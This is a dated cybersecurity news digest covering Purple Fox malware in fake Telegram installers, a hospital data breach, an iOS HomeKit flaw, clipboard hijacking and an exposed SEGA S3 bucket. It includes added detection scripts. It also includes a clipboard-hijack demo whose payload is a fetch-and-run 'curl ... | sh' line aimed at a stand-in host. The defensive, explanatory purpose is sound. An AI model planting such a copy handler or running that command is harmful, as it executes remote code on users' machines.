Tuesday, January 4, 2022
Beware of Fake Telegram Messenger App Hacking PCs with Purple Fox Malware
FROM THE MEDIA: Trojanized installers of the Telegram messaging application are being used to distribute the Windows-based Purple Fox backdoor on compromised systems. That's according to new research published by Minerva Labs, describing the attack as different from intrusions that typically take advantage of legitimate software for dropping malicious payloads. "This threat actor was able to leave most parts of the attack under the radar by separating the attack into several small files, most of which had very low detection rates by [antivirus] engines, with the final stage leading to Purple Fox rootkit infection," researcher Natalie Zargarov said. First discovered in 2018, Purple Fox comes with rootkit capabilities that allow the malware to be planted beyond the reach of security solutions and evade detection. A March 2021 report from Guardicore detailed its worm-like propagation feature, enabling the backdoor to spread more rapidly. Then in October 2021, Trend Micro researchers uncovered a .NET implant dubbed FoxSocket deployed in conjunction with Purple Fox that takes advantage of WebSockets to contact its command-and-control (C2) servers for a more secure means of establishing communications. "The rootkit capabilities of Purple Fox make it more capable of carrying out its objectives in a stealthier manner," the researchers noted. "They allow Purple Fox to persist on affected systems as well as deliver further payloads to affected systems."
READ THE STORY: THN
ANALYST COMMENT: NSTR
Purple Fox malware distributed via malicious Telegram installers
FROM THE MEDIA: A malicious Telegram for Desktop installer distributes the Purple Fox malware to install further malicious payloads on infected devices. The installer is a compiled AutoIt script named "Telegram Desktop.exe" that drops two files: an actual Telegram installer and a malicious downloader. While the legitimate Telegram installer dropped alongside the downloader isn't executed, the AutoIt program does run the downloader (TextInputh.exe). When TextInputh.exe is executed, it creates a new folder ("1640618495") under "C:\Users\Public\Videos\" and connects to the C2 to download a 7z utility and a RAR archive (1.rar). The archive contains the payload and the configuration files, and the 7z program unpacks everything into the ProgramData folder.
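The chain above (AutoIt "Telegram Desktop.exe", TextInputh.exe, a numeric folder under C:\Users\Public\Videos\, then 7z.exe and 1.rar) is concrete enough to hunt for. The following is an added example, not code from Minerva Labs, BleepingComputer or the campaign itself: it matches those behaviours against Sysmon-style process-creation and file-creation events and correlates them per host. The field names (type, host, image, target), the weights and every event are constructed for the demo.

```javascript
// Added example (not Minerva Labs' or BleepingComputer's code): match the
// Purple Fox dropper behaviour described above against Sysmon-style
// ProcessCreate / FileCreate events. Field names (type, host, image, target)
// and all events below are constructed for the demo.

// The downloader creates a numeric, epoch-like folder under Public\Videos.
const STAGING_DIR = /^C:\\Users\\Public\\Videos\\\d{6,}\\/i;

// Each rule tests one parsed event; weight reflects how specific the IOC is.
const IOC_RULES = [
  { name: 'telegram-autoit-dropper', weight: 1,
    test: (e) => e.type === 'ProcessCreate' && /\\Telegram Desktop\.exe$/i.test(e.image) },
  { name: 'textinputh-downloader', weight: 3,
    test: (e) => e.type === 'ProcessCreate' && /\\TextInputh\.exe$/i.test(e.image) },
  { name: 'public-videos-staging', weight: 2,
    test: (e) => e.type === 'FileCreate' && STAGING_DIR.test(e.target) },
  { name: '7z-or-rar-in-staging', weight: 2,
    test: (e) => e.type === 'FileCreate' && STAGING_DIR.test(e.target)
      && /\\(7z\.exe|1\.rar)$/i.test(e.target) },
];

// Return every (host, rule) hit; one event can match several rules.
function scanEvents(events) {
  const hits = [];
  for (const e of events) {
    for (const r of IOC_RULES) {
      if (r.test(e)) hits.push({ host: e.host, rule: r.name, weight: r.weight });
    }
  }
  return hits;
}

// Correlate per host: the dropper name alone is weak (any renamed AutoIt binary),
// downloader + staging folder together is strong. Each rule counts once per host.
function assessHosts(events) {
  const perHost = new Map();
  for (const h of scanEvents(events)) {
    const s = perHost.get(h.host) || { score: 0, rules: new Set() };
    if (!s.rules.has(h.rule)) { s.score += h.weight; s.rules.add(h.rule); }
    perHost.set(h.host, s);
  }
  const out = {};
  for (const [host, s] of perHost) {
    out[host] = { score: s.score, rules: [...s.rules].sort(),
      verdict: s.score >= 5 ? 'likely-purplefox' : 'suspicious' };
  }
  return out;
}

// Constructed events: ws-01 shows the full chain, ws-02 is benign activity,
// ws-03 only ran a file carrying the dropper's name.
const SAMPLE_EVENTS = [
  { host: 'ws-01', type: 'ProcessCreate', image: 'C:\\Users\\alice\\Downloads\\Telegram Desktop.exe' },
  { host: 'ws-01', type: 'ProcessCreate', image: 'C:\\Users\\alice\\AppData\\Local\\Temp\\TextInputh.exe' },
  { host: 'ws-01', type: 'FileCreate', target: 'C:\\Users\\Public\\Videos\\1640618495\\7z.exe' },
  { host: 'ws-01', type: 'FileCreate', target: 'C:\\Users\\Public\\Videos\\1640618495\\1.rar' },
  { host: 'ws-02', type: 'ProcessCreate', image: 'C:\\Users\\bob\\Downloads\\tsetup.exe' },
  { host: 'ws-02', type: 'FileCreate', target: 'C:\\Users\\Public\\Videos\\holiday.mp4' },
  { host: 'ws-03', type: 'ProcessCreate', image: 'D:\\tools\\Telegram Desktop.exe' },
];

console.log(JSON.stringify(assessHosts(SAMPLE_EVENTS), null, 2));
```

The scoring deliberately keeps the file name "Telegram Desktop.exe" as a weak signal on its own; the write-up's point is that each stage looks harmless in isolation, so the detection value is in the combination of downloader execution and the staging folder on the same host.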
READ THE STORY: Bleeping Computer
ANALYST COMMENT: NSTR
Broward Health discloses data breach affecting 1.3 million people
FROM THE MEDIA: The Broward Health public health system has disclosed a large-scale data breach incident impacting 1,357,879 individuals. Broward Health is a Florida-based healthcare system with over thirty locations offering a wide range of medical services and receives over 60,000 admissions per year. The healthcare system disclosed a cyberattack on October 15, 2021, when an intruder gained unauthorized access to the hospital's network and patient data. The organization discovered the intrusion four days later, on October 19, and immediately notified the FBI and the US Department of Justice. At the same time, all employees were advised to change their user passwords, and Broward Health contracted a third-party cybersecurity expert to help with the investigation. The investigation revealed that the threat actors gained access to patients' personal medical information, which may include the following items: full name, date of birth, physical address, phone number, financial or bank information, Social Security number, insurance information and account number, medical information and history, condition, treatment and diagnosis, driver's license number, and email address. Although Broward Health confirms that the network intruder exfiltrated the above data, it notes that there is no evidence that the threat actors misused it. Notably, the intrusion point was determined to be a third-party medical provider who was permitted access to the system to provide their services.
READ THE STORY: Bleeping Computer
ANALYST COMMENT: NSTR
‘doorLock’ – A persistent denial of service flaw affecting iOS 15.2 – iOS 14.7
FROM THE MEDIA: Security researcher Trevor Spiniolas discovered a new persistent DoS vulnerability, dubbed 'doorLock,' affecting Apple HomeKit in iOS 14.7 through 15.2. HomeKit is a software framework by Apple, made available in iOS/iPadOS, that lets users configure, communicate with, and control smart-home appliances using Apple devices. It provides users with a way to automatically discover such devices and configure them. Spiniolas speculates that Apple has been aware of the flaw since August 10, 2021, but the IT giant has yet to address it. "I believe this bug is being handled inappropriately as it poses a serious risk to users and many months have passed without a comprehensive fix," writes the researcher. "The public should be aware of this vulnerability and how to prevent it from being exploited, rather than being kept in the dark," said Spiniolas. An attacker could trigger the vulnerability by changing the name of a HomeKit device to a very large string (500,000 characters in testing). Upon loading the string, iOS and iPadOS devices will reboot and become unusable. The vulnerability can only be exploited by attackers with access to the victim's 'Home', or if the victim manually accepts an invitation to one. Spiniolas released an iOS app that has access to Home data and changes HomeKit device names. "When the name of a HomeKit device is changed to a large string (500,000 characters in testing), any device with an affected iOS version installed that loads the string will be disrupted, even after rebooting. Restoring a device and signing back into the iCloud account linked to the HomeKit device will again trigger the bug. There are two main scenarios that may occur afterwards, as outlined in the "Effects" section of this document," wrote the expert. In order to solve the issue, it is necessary to force a reset of the device, which will cause all stored data to be removed. The only way to recover the removed data is to restore a working backup.
The expert explained that once the device reboots and the user signs into the same iCloud account linked to the HomeKit device, the doorLock bug will be triggered again.
READ THE STORY: Security Affairs
ANALYST COMMENT: NSTR
Don't copy-paste commands from webpages — you can get hacked
FROM THE MEDIA: Programmers, sysadmins, security researchers, and tech hobbyists who copy and paste commands from web pages into a console or terminal are warned they risk having their system compromised. A technologist has demonstrated a simple trick that'll make you think twice before copying and pasting text from web pages. Recently, Gabriel Friedlander, founder of security awareness training platform Wizer, demonstrated an obvious yet surprising hack that'll make you cautious about copying and pasting commands from web pages. It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications, a Windows command prompt or a Linux terminal. But Friedlander warns a webpage could be covertly replacing the contents of what goes on your clipboard, so that what actually ends up being copied to your clipboard is vastly different from what you intended to copy. Worse, without the necessary due diligence, the developer may only realize their mistake after pasting the text, at which point it may be too late.
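The mechanism behind the warning is a page-side listener on the browser's copy event. The block below is an added example, not Friedlander's demo: hijackCopy() is the attacker side (a 'copy' handler that replaces the selection on the clipboard), and inspectPaste() is a defensive check a practitioner could run on clipboard text before it reaches a terminal. The ClipboardEvent is mocked so the example runs under Node; in a browser the real event would be passed instead. The URL in the payload is made up.

```javascript
// Added example, not Friedlander's demo. hijackCopy() is the attacker side the
// article describes: a 'copy' handler that replaces the selection on the
// clipboard. inspectPaste() is a defensive check to run on clipboard text before
// it goes anywhere near a terminal. The event is mocked so this runs under Node;
// in a browser the real ClipboardEvent is passed instead. The URL is made up.

const SHOWN_COMMAND = 'sudo apt update';

// Attacker: what the page displays is not what is copied. The trailing newline
// matters: many terminals run the pasted line immediately, before the user
// can read it.
function hijackCopy(event) {
  const payload = 'curl -s https://evil.example/x | sh\n' + SHOWN_COMMAND;
  event.clipboardData.setData('text/plain', payload);
  event.preventDefault(); // otherwise the browser writes the real selection
  return payload;
}
// Browser wiring would be: document.addEventListener('copy', hijackCopy);

// Defender: flag anything that could execute or hide on paste. `expected` is
// the text the user believes they selected (e.g. what a clipboard viewer shows).
function inspectPaste(text, expected) {
  const findings = [];
  if (/[\r\n]/.test(text)) findings.push('line break: may auto-execute on paste');
  if (/[\u200B-\u200F\u2028\u2029\u00A0\uFEFF]/.test(text)) findings.push('hidden or zero-width characters');
  if (/\x1b[\[\]]/.test(text)) findings.push('terminal escape sequence');
  if (expected !== undefined && text !== expected) findings.push('clipboard differs from displayed text');
  return { safe: findings.length === 0, findings };
}

// Minimal stand-in for the browser ClipboardEvent (constructed for the demo).
function mockCopyEvent() {
  const store = {};
  return {
    defaultPrevented: false,
    preventDefault() { this.defaultPrevented = true; },
    clipboardData: {
      setData: (type, value) => { store[type] = value; },
      getData: (type) => store[type] || '',
    },
  };
}

// Simulate a user copying SHOWN_COMMAND from a hostile page, then checking it.
function demo() {
  const ev = mockCopyEvent();
  hijackCopy(ev);
  const onClipboard = ev.clipboardData.getData('text/plain');
  return { onClipboard, prevented: ev.defaultPrevented, report: inspectPaste(onClipboard, SHOWN_COMMAND) };
}

console.log(JSON.stringify(demo(), null, 2));
```

The practical habit is the one the article implies: paste into an editor or a clipboard viewer first, and treat any line break in copied shell text as a reason to stop, because the terminal may execute the first line before the rest is even visible.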
READ THE STORY: Bleeping Computer
ANALYST COMMENT: NSTR
SEGA Europe left AWS S3 bucket unsecured exposing data and infrastructure to attack
FROM THE MEDIA: At the end of last year, gaming giant SEGA Europe inadvertently left users' personal information publicly accessible in an Amazon Web Services (AWS) S3 bucket, cybersecurity firm VPN Overview reported. The unsecured S3 bucket contained multiple sets of AWS keys that could have allowed threat actors to access many of SEGA Europe's cloud services, along with MailChimp and Steam keys that allowed access to those services in SEGA's name. "Researchers found compromised SNS notification queues and were able to run scripts and upload files on domains owned by SEGA Europe. Several popular SEGA websites and CDNs were affected," reads the report published by VPN Overview. The unsecured S3 bucket could potentially also grant access to user data, including information on hundreds of thousands of users of the Football Manager forums at community.sigames.com. The security firm states that there are no indications malicious third parties accessed the sensitive data or exploited any of the mentioned vulnerabilities before the researchers did. The researchers reported that they were able to upload files, execute scripts, alter existing web pages and modify the configuration of critically vulnerable SEGA domains. The list of affected domains includes downloads.sega.com, cdn.sega.com, careers.sega.co.uk, sega.com, and bayonetta.com. Many of the impacted domains have high domain authority scores. The compromise of some of the company's domains would have allowed attackers to distribute malware via SEGA's infrastructure.
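Two separate failures are described here: a bucket readable by anyone, and objects in it that carried live credentials for other services. The following is an added example, not VPN Overview's tooling: auditBucket() takes a plain description of a bucket's ACL grants and object contents and flags both problems. The bucket, its objects and the field names are constructed for the demo; the AWS key pair is the example pair AWS uses in its own documentation, and the MailChimp key shape is assumed from its commonly documented "32 hex characters-usN" format. Steam Web API keys are plain 32-character hex strings and are not matched, since that pattern is too generic without context.

```javascript
// Added example, not VPN Overview's tooling. auditBucket() checks an S3 bucket
// description for the two problems the report describes: an ACL that grants
// access to everyone, and objects whose contents carry live credentials. The
// bucket object, field names and all contents below are constructed for the
// demo; the AWS key pair is the one AWS uses in its documentation.

const ALL_USERS = 'http://acs.amazonaws.com/groups/global/AllUsers';
const AUTH_USERS = 'http://acs.amazonaws.com/groups/global/AuthenticatedUsers';

// Credential formats. Steam Web API keys (bare 32-char hex) are deliberately
// not included: too generic to match without surrounding context.
const SECRET_PATTERNS = [
  { name: 'aws-access-key-id', re: /\b(?:AKIA|ASIA)[0-9A-Z]{16}\b/g },
  { name: 'aws-secret-access-key', re: /aws_secret_access_key\s*[=:]\s*["']?([A-Za-z0-9/+=]{40})\b/gi },
  { name: 'mailchimp-api-key', re: /\b[0-9a-f]{32}-us\d{1,2}\b/g }, // assumed format
];

// Never put a full secret into a finding or a log line.
function redact(s) {
  return s.slice(0, 4) + '...' + s.slice(-2);
}

function auditBucket(bucket) {
  const findings = [];
  // 1. ACL grants to the AllUsers / AuthenticatedUsers groups make the bucket public.
  for (const g of bucket.grants || []) {
    if (g.granteeUri === ALL_USERS || g.granteeUri === AUTH_USERS) {
      findings.push({ kind: 'public-acl', detail: `${g.permission} for ${g.granteeUri.split('/').pop()}` });
    }
  }
  // 2. Object contents that look like credentials for AWS or third-party services.
  for (const obj of bucket.objects || []) {
    for (const p of SECRET_PATTERNS) {
      for (const m of obj.body.matchAll(p.re)) {
        findings.push({ kind: p.name, key: obj.key, sample: redact(m[1] || m[0]) });
      }
    }
  }
  return findings;
}

// Constructed bucket: world-readable and -writable, with a committed .env file.
const SAMPLE_BUCKET = {
  name: 'example-assets',
  grants: [
    { granteeUri: ALL_USERS, permission: 'READ' },
    { granteeUri: ALL_USERS, permission: 'WRITE' },
    { granteeId: 'owner-canonical-id', permission: 'FULL_CONTROL' },
  ],
  objects: [
    { key: 'config/.env', body: [
        'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE',
        'AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
        'MAILCHIMP_KEY=0123456789abcdef0123456789abcdef-us6',
      ].join('\n') },
    { key: 'css/site.css', body: 'body { color: #333; }' },
    { key: 'release.sha256', body: 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855' },
  ],
};

console.log(JSON.stringify(auditBucket(SAMPLE_BUCKET), null, 2));
```

The WRITE grant is the finding that maps to the researchers being able to upload files and alter pages served from SEGA domains; the credential hits map to the AWS, MailChimp and Steam keys that extended the exposure beyond the bucket itself. Pattern matching of this kind produces false positives on hashes and example keys, so hits should be confirmed (e.g. by checking whether the key is still active) before being reported as live.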
READ THE STORY: Security Affairs
ANALYST COMMENT: NSTR
On the morning of Monday, January 3, 2022, hackers defaced the official website of the Jerusalem Post and compromised Maariv's Twitter account.
FROM THE MEDIA: Two years ago, Qasem Soleimani, a top Iranian general, was killed in a US drone strike in Baghdad, Iraq. Soleimani was the head of the Quds Force, the foreign operations wing of Iran's Revolutionary Guards. The strike took place on this date in 2020. To mark the anniversary of Soleimani's death, hackers targeted several top Israeli media outlets, including the Jerusalem Post and Maariv, one of the major Israeli national Hebrew-language daily newspapers. The hackers posted threatening messages on the outlets' properties. The attack occurred on Monday, and the targets were the Jerusalem Post website and the Twitter handle of the Hebrew-language news outlet Maariv. Instead of the main news page, the Jerusalem Post's website showed the image of a bullet-shaped object shot from a red ring worn on a finger, a reference to a distinctive ring Soleimani frequently wore. A similar image appeared on Maariv's Twitter account, depicting a fist firing a shell from a ring with a red-colored stone on a finger pointed towards an exploded dome. The image also carried a message in Hebrew and English.
READ THE STORY: Hack Read
ANALYST COMMENT: NSTR
Paper of interest
North Korean Cyber Attacks and Policy Responses: An Interdisciplinary Theoretical Framework
FROM THE MEDIA: This study conducts a qualitative analysis of the objectives, forms, current trends, and characteristics of North Korean cyber terror attacks and suggests a way to ensure further progress towards a successful international policy response. Despite the capricious changes that have recently occurred within the international political atmosphere, North Korea continues to constitute a threat to international stability through its ongoing advancement of nuclear weapons and long-range ballistic missiles. The difficulty of attribution and the relatively low costs associated with launching cyber offensives make cyber terrorism an attractive option for North Korea. In an effort to direct attention to these circumstances, this study aims to share explicit experts’ perspectives in the field of cyberterrorism in South Korea. Consequently, the study purports to contribute to existing academic discussion and practices on cyber terror and cybercrime. Furthermore, this study adopts perspectives from criminological theoretical frameworks and the network theory of world politics to substantiate a more comprehensive view of North Korea’s cyberterrorism which considers the multifaceted and asymmetrical nature of cyberterrorism within the context of postmodern international politics.
READ THE STORY: Center for Cyber Crime
ANALYST COMMENT: NSTR
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com